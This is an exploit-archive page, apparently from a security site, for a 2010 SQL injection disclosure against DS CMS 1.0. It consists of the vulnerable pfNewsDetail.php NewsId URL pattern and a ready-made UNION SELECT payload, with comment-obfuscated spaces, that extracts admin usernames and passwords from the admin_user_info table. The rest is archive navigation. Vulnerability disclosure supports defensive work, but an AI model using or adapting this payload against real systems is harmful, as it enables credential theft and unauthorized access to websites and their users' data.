DS CMS 1.0 SQL Injection

DS CMS 1.0 SQL Injection: Posted Jan 4, 2010; Authored by Palyo34 | Site 1923turk.biz; DS CMS version 1.0 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 332d59162a27a270fcc60fa607679dd08419f51d62169fd77feb2b48126db99a; Download | Favorite | View

DS CMS 1.0 SQL Injection

Script      : DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability
 
 Script site : http://cms.dsinternal.com/Home
 
 AUTHOR      :  Palyo34
    
 HOME        : http://www.1923turk.biz
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://server/path/pfNewsDetail.php?NewsId=[SQL]
 
Example:
 
-1/**/union/**/all/**/select/**/1,2,group_concat(UserPass,0x3a,UserName),4+from+admin_user_info--

Top Authors In Last 30 Days

Red Hat 194 files
Ubuntu 67 files
Debian 24 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,011)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,194)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,473)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,437)
UNIX (9,390)
UnixWare (187)
Windows (6,649)
Other

DS CMS 1.0 SQL Injection

DS CMS 1.0 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

DS CMS 1.0 SQL Injection

Share This

DS CMS 1.0 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems